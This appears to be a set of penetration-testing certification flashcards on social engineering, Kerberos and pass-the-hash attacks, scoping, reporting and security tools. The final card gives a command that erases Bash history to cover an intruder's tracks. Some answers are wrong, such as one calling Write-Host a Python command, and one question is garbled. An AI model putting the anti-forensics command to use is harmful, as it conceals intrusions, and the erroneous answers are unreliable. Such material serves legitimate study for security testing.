Susan calls staff at the company she has been contracted to conduct a phishing campaign against, focusing on individuals in the finance department. Over a few days, she persuades an employee to send a wire transfer to an account she has set up after telling the employee that she has let their boss know how talented they are. What motivation technique has she used?
Reciprocation
Which one of the following steps of the Cyber Kill Chain does not map to the Attacking and Exploiting stage of the penetration testing process?
Reconnaissance
Which one of the following activities is not commonly performed during the post-engagement cleanup phase?
Remediation of vulnerabilities
Renee is conducting a penetration test and discovers evidence that one of the systems she is exploring was already compromised by an attacker. What action should she take immediately after confirming her suspicions?
Report the potential compromise to the client
Alan is creating a list of recommendations that his organization can follow to remediate issues identified during a penetration test. In what phase of the testing process is Alan participating?
Reporting and Communication Results
Sherry is concerned that a web application in her organization supports unvalidated redirects. Which one of the following approaches would minimize the risk of this attack?
Restricting redirects to her domain
Chris believes that the Linux system he has compromised is a virtual machine. Which of the techniques will not provide useful hints about whether the system is a VM or not?
Run wmic baseboard to get manufacturer, product
Charles sends a phishing email to a target organization and includes the line "Only five respondents will receive a cash prize." Which social engineering motivation strategy is he using?
Scarcity
During a penetration test specifically scoped to a single web application, Chris discovers that the web server also contains a list of passwords to other servers at the target location. After he notifies the client, they ask him to use them to validate those servers, and he proceeds to test those passwords against the other servers. What has occurred?
Scope creep
Alex carefully pay attention to an employee as they type in their entry code to an employee as they type in their entry code to her target organization's high security area and writes down the code he observes. What type of attack has she conducted?
Shoulder surfing
Which of the following technologies is the most resistant to badge cloning attacks if implemented properly?
Smart cards
Tom's organization currently uses password-based authentication and would like to move to multifactor authentication. Which one of the following is an acceptable second factor?
Smartphone app
Michael's social engineering attack relies on telling the staff members he contacts that others have provided the information that he is requesting. What motivation technique is he using?
Social proof
Which social engineering motivation techniques relies on persuading the target that other people have behaved similarly an thus that they could too?
Social proof
Biometric authentication technology fits into what multifactor authentication category?
Something you are
Chris sends a phishing email specifically to Susan, the CEO at his target company. What type of phishing attack is he conducting?
Spear phishing
What type of credential used in Kerberos is often referred to as the "golden ticket" because of its potential for widespread reuse?
TGTs are incredibly valuable and can be created within extended life spans. When attackers succeed in acquiring TGTs, the TGTs are often called "golden tickets" because they allow complete access to the Kerberos-connected systems, including creation of new tickets, account changes, and even falsification of accounts or services.
Which one of the following items is not appropriate for the executive summary of a penetration testing report?
Technical details
What value would be used to encode an ampersand in a URL string?
The %26 value is used to URL-encode ampersands using the percent encoding scheme.
Jen has been contracted to perform a penetration test against Flamingo, Inc. As part of her penetration test, she has been asked to conduct a phishing campaign and to use the results of that campaign to gain access to Flamingo systems and networks. The scope of the penetration test does not include a physical penetration test, so Jen must work entirely remotely. After attempting to lure employees at Flamingo, Inc., to fall for a phishing campaign, Jen finds that she hasn't acquired any useful credentials. She decides to try a USB keydrop. Which of the following Social Engineering Toolkit modules should she select to help her succeed?
The Infectious Media Generator
Where are the LSA Secrets stored on a Windows system?
The Registry
Which one of the following PowerShell execution policies allows the execution of any PowerShell script that you write on the local machine but requires that scripts downloaded from the Internet are signed by a trusted publisher?
The RemoteSigned policy allows the execution of any PowerShell script that you write on the local machine but requires that scripts downloaded from the Internet are signed by a trusted publisher.
Joe is examining the logs for his web server and discovers that a user sent input to a web application that contained the string WAITFOR. What type of attack was the user likely attempting?
Timing-based SQL injection
Analyze the following segment of code: if [ $weekday==1 ] then /usr/local/bin/nmap 192.168.1.1 elif [ $weekday==3 ] then /usr/local/bin/nmap 192.168.1.2 else /ur/local/bin/nmap 192.168.1.0/24 fi In what language is this code written?
The code contains a fi statement, so it is written in Bash.
Analyze the following segment of code: for hst in range(0,256): ip= net + str(hst) print(ip,':',socket.gethostbyaddr(ip), '\n') In what language is this code written?
The code contains colons, so it is written in Python.
Analyze the following segment code: Do { $test = 'mike' + $test $cracked = Test-Password $test $++ } While ($cracked -eq 0) In what language is this code written?
The code contains curly braces, so it is written in PowerShell
The penetration testing agreement document that Greg asks his clients to sign includes a statement that the assessment is valid only at the point in time at which it occurs. Why does he include this language?
The environment is unlikely to be the same in the future.
Charleen has been tasked with continuing the exploitation process of a Windows 2012 server for which a fellow penetration tester has acquired user-level credentials. She knows that the server is fully patched and does not have exposed vulnerable services. Her goal is to obtain administrative access to the server. Charleen wants to attempt a kerberoasting attack. What should her first step be to accomplish?
The first step in a kerberoasting attack is to scan for Active Directory accounts with service principal names (SPNs) set. Next, she should request service tickets using the SPNs and then extract the service tickets. Once she has the tickets, she can conduct an offline brute-force attack against them to recover the passwords used to encrypt the tickets.
Jacob runs ls -l on a file and sees the following listing. What does he know about chsh? -rwsr-xr-x 1 root root 40432 Sep 27 2017 chsh
The letter s in -rwsr-xr-x indicates this is a Set User ID (SUID) binary that allows the file to be executed with the permissions of its owners. Here, the owner and group is root, so this file isn't likely to be useful for privilege escalation, and it isn't a tool that can be used to allow a reverse shell.
Who is the most effective person to facilitate a lessons learned session after a penetration test?
The most effective way to conduct a lessons learned session is to ask a neutral third party to serve as the facilitator, allowing everyone to express their opinions freely.
Michelle wants to attack the underlying hypervisor for a virtual machine. What type of attack is most likely to be successful?
The most practical answer is to compromise the administrative interface for the underlying hypervisor. While VM escape would be a useful tool, very few VM escape exploits have been discovered, and each has been quickly patched. That means that penetration testers can't rely on one being available and unpatched when they encounter a VM host, and should instead target administrative rights and access methods.
While Frank is performing a physical penetration test, he notices that the exit doors to the data center open automatically as an employee approaches them with a cart. What should he record in his notes?
The presence of an egress sensor
Charles has completed the scoping exercise for his penetration test and has signed the agreement with his client. Whose signature should be expected as the counter signature?
The proper signing authority
Where is the list of Linux users who can use elevated privileges via sudo typically found?
The sudoers file is typically found in the /etc/ directory is most Linux distributions
Which one of the following function calls is closely associated with Linux command injection attacks?
The system() function executes a command string against the operating system from within an application and may be used in command injection attacks.
During a penetration test, Bonnie discovers in a web server log that the testers attempted to access the following URL: http://www.mycompany.com/sortusers.php?file=C:\uploads\attack.ext What type of attack did they most likely attempt?
This URL contains the address of a local file passed to a web application as an argument. It is most likely a local file inclusion exploit, attempting to execute a malicious file that the testers previously uploaded to the server.
Charleen has been tasked with continuing the exploitation process of a Windows 2012 server for which a fellow penetration tester has acquired user-level credentials. She knows that the server is fully patched and does not have exposed vulnerable services. Her goal is to obtain administrative access to the server. Charleen has captured NTLM hashes and wants to conduct a pass-the-hash attacks. Unfortunately, she doesn't know which systems on the network may accept the hash. What tool could she use to help her conduct this test?
This situation calls for a tool that handles attacks against many machines effectively. Fortunately, Hydra is designed to do just that and includes support for NTLM hashes as a password-in fact, Medusa does too. Hashcat is a password cracking and recovery tool, while smbclient is a legitimate SMB client tool and isn't designed to conduct a network-wide test for pass-the-hash exploitability.
Brian is conducting a thorough technical review of his organization's web servers. He is specifically looking for signs that the servers may have been breached in the past. What term best describes this activity?
Threat Hunting
During a penetration test, Mike uses double tagging to send traffic to another system. What technique is he attempting?
VLAN hopping
Ricky is conducting a penetration test against a web application and is looking for potential vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in web applications?
VM escape
Wendy is a penetration tester who wishes to engage in a session hijacking attack. What information is crucial for Wendy to obtain to ensure that her attack will be successful?
Websites use HTTP cookies to maintain sessions over time. If Wendy is able to obtain a copy of user's session cookie, she can sue that cookie to impersonate the user's browser and hijack the authenticated session.
Cynthia wants to use a phishing attack to acquire credentials belonging to the senior leadership of her target. What type of phishing attack should she use?
Whaling
When should system hardening activities take place?
When the system initially built and periodically during its life.
Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of a footprint or reconnaissance exercise?
Whois
Which one the following OS should be avoided on production networks?
Windows Server 2003
Examine the following line of code. In what programming language is it written? Write-Host "The system contains several serious vulnerabilities."
Write-Host command is used to generate output in Python
Which one of the following is a static code analysis tool?
YASCA is a source code analyzer used to perform static analysis of applications. Peach is a fuzzing tool, which is a type of dynamic analysis. Immunity and WinDBG are debuggers, another class of dynamic analysis security testing tool.
Chris is assisting Ricky with his penetration test and would like to extend the vulnerability search to include the use of dynamic testing. Which one of the following tools can he use as an interception proxy?
ZAP (Zed Attack Proxy)
Norm is performing a penetration test a penetration test of a web application and would like to manipulate the input sent to the application before it leaves his browser. Which one of the following tools would assist him with this task?
ZAP (Zed Attack Proxy)
What technique is being used in the following command: Host -t axfr domain.com dns1.domain.com
Zone Transfer. The axfr flag indicates a zone transfer in both dig and host utilities.
Which one of the following commands will allow the file owner to execute a Bash script?
chmod u+x script.sh
Annie wants to cover her tracks after compromising a Linux system. If she wants to permantly remove evidence of the commands she inputs to a Bash shell, which of the following commands should she use?
ln /dev/null ~/.bash_history -sf